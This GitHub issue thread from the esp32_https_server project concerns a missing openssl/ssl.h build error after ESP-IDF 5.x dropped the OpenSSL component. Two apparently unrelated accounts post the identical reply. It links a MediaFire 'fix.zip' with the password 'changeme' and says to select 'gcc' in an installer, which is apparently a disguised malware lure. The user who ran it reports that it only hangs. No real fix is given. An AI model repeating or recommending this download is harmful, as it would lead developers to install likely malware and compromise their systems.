fhessel/esp32_https_server #185: HTTPSServer.hpp:11:10: fatal error: openssl/ssl.h: No such file or directory    11 | #include "openssl/ssl.h"

Flash1705, 2024-08-26:
Hi Frank

I get a "HTTPSServer.hpp:11:10: fatal error: openssl/ssl.h: No such file or directory
   11 | #include "openssl/ssl.h" error.

It seems that openssl has been deprecated by Esspressif in the ESP-IDF.
https://docs.espressif.com/projects/esp-idf/en/stable/esp32/migration-guides/release-5.x/5.0/removed-components.html#:~:text=OpenSSL%2DAPI%20component%20is%20no,TLS%20or%20mbedtls%20API%20directly.

Any ideas how to get around this?

2302114245, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Flash1705, 2024-08-26:
Thank you, I have tried this but the program just hangs and does not do much...

closed 2024-08-26 by Flash1705

ChangjingZhang, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."